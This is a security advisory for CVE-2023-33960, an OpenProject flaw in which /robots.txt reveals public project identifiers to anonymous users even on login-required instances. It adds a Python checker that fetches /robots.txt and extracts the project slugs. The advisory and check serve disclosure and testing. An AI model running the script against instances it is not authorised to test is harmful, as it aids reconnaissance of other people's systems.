PT-2023-24601 · Unknown · Openproject

Published

2023-06-01

·

Updated

2026-01-15

·

CVE-2023-33960

CVSS v3.1

7.5

High

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions: OpenProject versions prior to 12.5.6
Description: OpenProject is web-based project management software. It generates a robots.txt file that tells crawlers which routes they should or should not access; that file lists the identifiers of every public project in the instance. Even if the entire instance is marked "Login required", the /robots.txt route remains reachable without authentication in versions prior to 12.5.6, so an anonymous client can enumerate the identifiers (URL slugs) of all public projects.
Recommendations: For versions prior to 12.5.6, update to version 12.5.6 to resolve the issue. Alternatively, for versions greater than 10.0, download and apply the patchfile provided by the project. As a temporary workaround, consider marking public projects as non-public and granting membership to the users who need access to them.
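The following script is an added example for checking an instance, not code from the advisory or from OpenProject itself. It fetches /robots.txt anonymously (or, with no argument, runs against a constructed sample whose shape follows the Disallow rules OpenProject emits per project and whose project identifiers are hypothetical), extracts the project identifiers from the Disallow rules, and reports a finding when an instance that is configured as "Login required" still returns identifiers to an unauthenticated client. The login_required flag is an input you supply from the instance's settings; the script cannot read it anonymously.

```python
import re
import sys
from urllib.request import Request, urlopen
from urllib.error import HTTPError

# Constructed sample: the general shape of the robots.txt an OpenProject
# instance serves, with hypothetical project identifiers. Not captured
# from a real instance.
SAMPLE_ROBOTS_TXT = """\
User-agent: *
Disallow: /projects/demo-project/activity
Disallow: /projects/demo-project/repository
Disallow: /projects/your-scrum-project/activity
Disallow: /projects/your-scrum-project/repository
Disallow: /api/
"""

# OpenProject project identifiers are URL slugs: lower-case letters, digits,
# dashes and underscores. Only Disallow rules under /projects/ are of interest.
PROJECT_RULE = re.compile(
    r"^\s*Disallow:\s*/projects/([a-z0-9][a-z0-9_-]*)(?=/|\s|$)",
    re.IGNORECASE | re.MULTILINE,
)


def parse_project_identifiers(robots_txt: str) -> list:
    """Return project identifiers named in Disallow rules, deduplicated, in order."""
    seen = {}
    for match in PROJECT_RULE.finditer(robots_txt):
        seen.setdefault(match.group(1).lower(), None)
    return list(seen)


def assess(status_code: int, body: str, login_required: bool) -> dict:
    """Decide whether an unauthenticated /robots.txt response discloses projects.

    On an instance marked "Login required", an anonymous client should get no
    project identifiers back (either a non-200 response or a body without
    /projects/<identifier> rules). Any identifiers returned reproduce the issue.
    """
    identifiers = parse_project_identifiers(body) if status_code == 200 else []
    return {
        "status": status_code,
        "identifiers": identifiers,
        "leaks_identifiers": bool(login_required and identifiers),
    }


def fetch_robots(base_url: str, timeout: float = 10.0) -> tuple:
    """Fetch /robots.txt anonymously: no cookies, no Authorization header."""
    req = Request(base_url.rstrip("/") + "/robots.txt",
                  headers={"User-Agent": "robots-check/1.0"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as err:
        # 401/403 is the expected answer from a fixed, login-required instance.
        return err.code, err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    if len(sys.argv) == 2:
        status, body = fetch_robots(sys.argv[1])   # e.g. https://openproject.example
    else:
        status, body = 200, SAMPLE_ROBOTS_TXT       # offline run on the sample
    result = assess(status, body, login_required=True)
    for ident in result["identifiers"]:
        print(f"public project identifier exposed: {ident}")
    print("disclosure:", result["leaks_identifiers"])
```

Run it with the instance's base URL as the only argument from a host that holds no session for that instance; a patched, login-required instance should yield no identifiers, while a vulnerable one prints every public project's slug.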

Exploit

Fix

Weakness Enumeration

Cleartext Transmission of Sensitive Information

Information Disclosure

Related Identifiers

BIT-OPENPROJECT-2023-33960
CVE-2023-33960
GHSA-XJFC-FQM3-95Q8

Affected Products

Openproject